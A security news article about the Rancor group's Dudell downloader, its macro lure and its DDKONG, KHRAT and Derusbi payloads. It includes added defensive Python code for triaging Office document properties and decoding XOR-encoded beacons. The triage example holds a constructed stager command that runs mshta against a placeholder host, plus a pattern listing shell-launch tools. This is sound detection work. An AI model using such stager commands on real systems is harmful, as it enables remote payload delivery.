A Chinese-linked hacking group deployed a new malware strain dubbed Dudell as part of attacks targeting Cambodian government organizations between December 2018 and January 2019.
The threat group, tracked as Rancor by Palo Alto Networks’ Unit 42, has run highly targeted cyber-espionage campaigns against South East Asian targets, including but not limited to Cambodia and Singapore, since at least 2017.
This is not the first time Rancor has been spotted using previously unknown custom malware: Unit 42 also observed the group deploying the DDKONG and PLAINTEE families in attacks carried out in 2017 and 2018.
Custom malware used against government orgs
“Between early December 2018 and the end of January 2019, Rancor conducted at least two rounds of attacks intending to install Derusbi or KHRat malware on victim systems,” Unit 42 says.
The DUDELL sample discovered by Unit 42 exhibits behavior similar to another Rancor-linked sample that Check Point researchers found while tracking a campaign against several Southeast Asian government entities that spanned more than seven months.
Rancor malware malicious behavior
This malware downloader was delivered as a decoy Microsoft Excel document designed to run malicious macros on the target’s computer, with the end goal of downloading and executing second-stage malware payloads.
“The macro in this document gets executed when the user views the document and clicks Enable Content, at which point the macro locates and executes the data located under the Company field in the document’s properties,” the researchers add.
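Hiding the stager command in the document’s Company property keeps it out of the macro body that most sandboxes and YARA rules look at, so a triage step worth having is to pull that property out and judge it on its own. The script below is an added example written for this article, not code from Unit 42 or from the Rancor samples; it assumes an OOXML (.xlsm-style) package, where the Company field lives in docProps/app.xml (the article does not say whether the lure was a legacy binary .xls; for that format the same property sits in the SummaryInformation OLE stream and a library such as olefile would be needed instead). The workbook it builds, the command string and the host name example.invalid are constructed sample input.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import Optional
from xml.sax.saxutils import escape

# docProps/app.xml namespace in OOXML packages; the Company property lives there.
APP_NS = "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties"

# Tokens that are very unusual in a real company name but typical of a
# command a macro would hand to the shell. Extend for your environment.
SUSPICIOUS = re.compile(
    r"(\bcmd(\.exe)?\b|powershell|mshta|wscript|cscript|regsvr32|rundll32|"
    r"certutil|bitsadmin|https?://|%[A-Za-z_]+%)",
    re.IGNORECASE,
)


def build_sample_workbook(company_value: str) -> bytes:
    """Constructed sample input: a minimal macro-enabled OOXML package.

    This is NOT a real Rancor document; it only reproduces the structure
    the triage code needs (docProps/app.xml plus a vbaProject.bin part).
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr(
            "docProps/app.xml",
            f'<Properties xmlns="{APP_NS}">'
            f"<Application>Microsoft Excel</Application>"
            f"<Company>{escape(company_value)}</Company></Properties>",
        )
        z.writestr("xl/vbaProject.bin", b"\x00")  # presence marks the workbook as macro-enabled
    return buf.getvalue()


def extract_company(data: bytes) -> Optional[str]:
    """Return the Company document property, or None if the package has none."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        if "docProps/app.xml" not in z.namelist():
            return None
        root = ET.fromstring(z.read("docProps/app.xml"))
        el = root.find(f"{{{APP_NS}}}Company")
        return el.text if el is not None else None


def has_macros(data: bytes) -> bool:
    """True if the package carries a VBA project part."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return any(n.lower().endswith("vbaproject.bin") for n in z.namelist())


def triage(data: bytes) -> dict:
    """Flag a workbook whose Company property looks like a command rather than a name."""
    company = extract_company(data)
    findings = []
    if company:
        if len(company) > 64:
            findings.append("company_property_unusually_long")
        if SUSPICIOUS.search(company):
            findings.append("command_like_content_in_company_property")
    return {"has_macros": has_macros(data), "company": company, "findings": findings}


if __name__ == "__main__":
    benign = build_sample_workbook("Contoso Ltd")
    # Constructed stager command with a hypothetical host; not a real indicator.
    lure = build_sample_workbook("cmd /c mshta http://example.invalid/stage2.hta")
    print(triage(benign))
    print(triage(lure))
```

Run it against quarantined attachments before detonation: a macro-enabled workbook whose Company (or Comments, Title, Subject) property contains shell syntax is a strong lead regardless of how obfuscated the VBA itself is, and the extracted string is the piece to feed into URL and hash pivots.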
A custom obfuscated VBScript named Chrome.vbs was also used by the Rancor hackers in attacks from July 2019; it plants “multiple chained persistent artifacts” that maintain the group’s foothold on the compromised computers.
VBScript payload execution flow
Second stage malware payloads
As a second-stage payload, the downloader drops DDKONG, which exfiltrates XOR-encoded victim information including the hostname, IP address, and locale, along with other operating system details.
The DDKONG malware can terminate processes on the compromised hosts, list folder contents, download and upload files, execute commands, take screenshots, and even act as a reverse shell to provide the attackers with remote access to the infected systems.
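XOR encoding of the victim profile is obfuscation, not encryption, and a captured beacon can usually be recovered from the traffic alone. The following is an added example written for this article, not Unit 42 or DDKONG code: it brute-forces a single-byte key over a captured blob, ranking candidates by how printable they decode and by the presence of a crib (“Windows”) that almost every Windows host profile contains. The single-byte key length and the HOST=/IP=/LOCALE=/OS= field layout are assumptions for illustration; the article does not describe the real key or format, and the beacon bytes are constructed sample input.

```python
from typing import Dict, Tuple

# Constructed sample beacon fields in the style the article describes
# (hostname, IP, locale, OS details). Not taken from a real DDKONG sample;
# the field layout and separators are assumptions for illustration.
SAMPLE_FIELDS = "HOST=WS-FIN-07|IP=10.20.30.41|LOCALE=km-KH|OS=Windows 7 Service Pack 1"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key; the same call encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def printable_ratio(candidate: bytes) -> float:
    """Share of bytes that are printable ASCII (or tab/newline); real text scores near 1.0."""
    good = sum(1 for b in candidate if 32 <= b < 127 or b in (9, 10, 13))
    return good / max(len(candidate), 1)


def recover_single_byte_key(blob: bytes, crib: bytes = b"Windows") -> Tuple[int, bytes]:
    """Brute-force a single-byte XOR key over a captured beacon.

    Assumes (not stated in the article) that the key is one byte. Candidates
    containing the crib, a string almost every Windows beacon carries,
    are preferred; otherwise the most printable decoding wins.
    """
    best = (-1, -1.0, b"")
    for k in range(256):
        plain = xor_bytes(blob, bytes([k]))
        score = printable_ratio(plain) + (1.0 if crib in plain else 0.0)
        if score > best[1]:
            best = (k, score, plain)
    return best[0], best[2]


def parse_fields(plain: bytes) -> Dict[str, str]:
    """Split the recovered beacon into key/value pairs (separator layout is assumed)."""
    out: Dict[str, str] = {}
    for part in plain.decode("ascii", errors="replace").split("|"):
        if "=" in part:
            k, v = part.split("=", 1)
            out[k] = v
    return out


if __name__ == "__main__":
    # Stand-in for bytes captured on the wire: the sample fields XORed with 0x5A (constructed).
    captured = xor_bytes(SAMPLE_FIELDS.encode("ascii"), bytes([0x5A]))
    key, plain = recover_single_byte_key(captured)
    print(f"recovered key=0x{key:02x}")
    print(parse_fields(plain))
```

If the real sample turns out to use a multi-byte key, the same scoring works per key position (Hamming-distance key-length guessing followed by one single-byte search per column); the point for responders is that a decoded beacon yields the hostname and IP of the victim, which is exactly what is needed to scope the intrusion from network captures alone.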
DUDELL was also observed delivering KHRAT payloads, which likewise provide reverse shell capabilities, as well as Derusbi backdoor Trojans that load additional modules to extend their functionality.
Unit 42 provides a list of indicators of compromise (IOCs) including command and control server addresses and malware sample SHA256 hashes at the end of their Rancor report.